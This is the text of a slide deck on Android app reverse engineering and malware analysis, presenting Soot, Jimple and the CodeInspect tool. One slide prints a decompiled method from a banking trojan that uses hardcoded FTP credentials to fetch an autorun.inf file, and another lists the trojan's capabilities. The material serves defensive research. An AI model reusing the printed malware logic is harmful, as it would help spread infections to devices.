Dismantling droids for breakfast - The current state of app reverse - - PowerPoint PPT Presentation

SOFTWARE ENGINEERING

GROUP

SECURE

Dismantling droids for breakfast - The current state of app reverse engineering

Siegfried Rasthofer

SOFTWARE ENGINEERING

GROUP

SECURE

#whoami

2

• 3rd year PhD-Student at Secure Software 


Engineering Group Darmstadt, Germany 
 (Prof. Dr. Eric Bodden)

• Research interest:
• Applied software security on Android
• Static-/dynamic code analyses
• Android Security:
• Found 2 AOSP exploits
• Security Analysis of Backend-as-a-Service
• Korea Threat investigation together with McAfee

Research Lab

SOFTWARE ENGINEERING

GROUP

SECURE

3

SOFTWARE ENGINEERING

GROUP

SECURE

4

How easy is it to dismantle your app?

SOFTWARE ENGINEERING

GROUP

SECURE

5

How to secure my app against piracy

I am developing an android app and I am planning to publish it (paid app). I have heard that it is very easy to pirate Android apps (much easier than iphone). I was wondering from your experience or what you know, how can increase the security of my app? I know that I can never get it 100% secured but I want to make it harder for people to pirate it or distribute it illegaly Any ideas, experiences, comments you can share? That will be greatly appreciated Best regards

Source: stackoverflow.com

SOFTWARE ENGINEERING

GROUP

SECURE

6

Is it still easy to dismantle your app?

SOFTWARE ENGINEERING

GROUP

SECURE

A new Binary Analysis Framework for Android and Java Bytecode

7

SOFTWARE ENGINEERING

GROUP

SECURE

8

vs

SOFTWARE ENGINEERING

GROUP

SECURE

9

Soot

SOFTWARE ENGINEERING

GROUP

SECURE

10

Soot

Input/Output .dex .java .jimple .apk .class

• Various callgraph algorithms
• Sophisticated algorithms used in compiler

construction

• Code manipulation

Soot

https://github.com/Sable/soot/wiki

SOFTWARE ENGINEERING

GROUP

SECURE

11

Soot Jimple

SOFTWARE ENGINEERING

GROUP

SECURE

12

public static boolean UsbAutoRunAttack(android.content.Context $param0) { java.lang.String $String; $String = <smart.apps.droidcleaner.Tools: java.lang.String urlServer>; ... staticinvoke <smart.apps.droidcleaner.Tools: boolean DownloadFile(java.lang.String, java.lang.String, java.lang.String, java.lang.String, android.content.Context)> ($String, "autorun.inf", "ftpupper", "thisisshit007", $param0); return true; }

Declarations Code Return-Statement

Jimple Soot

SOFTWARE ENGINEERING

GROUP

SECURE

13

Soot Jimple CodeInspect

SOFTWARE ENGINEERING

GROUP

SECURE

14

CodeInspect

Jimple Code Readable Files Code Refactoring Debugger Java Source Enhancement Syntax Highlighting Code Manipulation Dataflow Visualizer Deobfuscator “Region“ Detection

Jimple Soot

SOFTWARE ENGINEERING

GROUP

SECURE

Let’s get started…

15

• 1. Import APK
• 2. Start Device

SOFTWARE ENGINEERING

GROUP

SECURE

16

infected >20,000 user

SOFTWARE ENGINEERING

GROUP

SECURE

17

Android/BadAccents

Banking Trojan Activation Component SMS HTTP E-Mail Intercept SMS Intercept Call Install Fake AV Uninstall AV File System Native Code User Waiting Time Send SMS Tapjacking Attack Banking Trojan Activation Component SMS HTTP E-Mail Intercept SMS Intercept Call Install Fake AV Uninstall AV File System Native Code User Waiting Time Send SMS Tapjacking Attack

SOFTWARE ENGINEERING

GROUP

SECURE

Live-Demo

18

SOFTWARE ENGINEERING

GROUP

SECURE

Future Steps

19

• New Plugins under development
• Easily add own analyses

SOFTWARE ENGINEERING

GROUP

SECURE

How do I get this tool?

20

SOFTWARE ENGINEERING

GROUP

SECURE

21

SOFTWARE ENGINEERING

GROUP

SECURE

Siegfried Rasthofer Secure Software Engineering Group Email: siegfried.rasthofer@cased.de Blog: http://sse-blog.ec-spride.de Website: http://sse.ec-spride.de Twitter: @CodeInspect

22